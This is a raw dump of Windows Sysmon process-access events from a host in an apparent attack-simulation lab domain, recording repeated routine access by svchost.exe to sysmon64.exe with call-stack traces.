10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001518Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001517Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001516Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001515Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001514Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001513Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001512Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001511Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001510Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001509Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001508Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001507Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001506Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001505Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001504Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001503Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001502Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001501Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001500Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001499Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001498Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001497Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001496Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001495Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 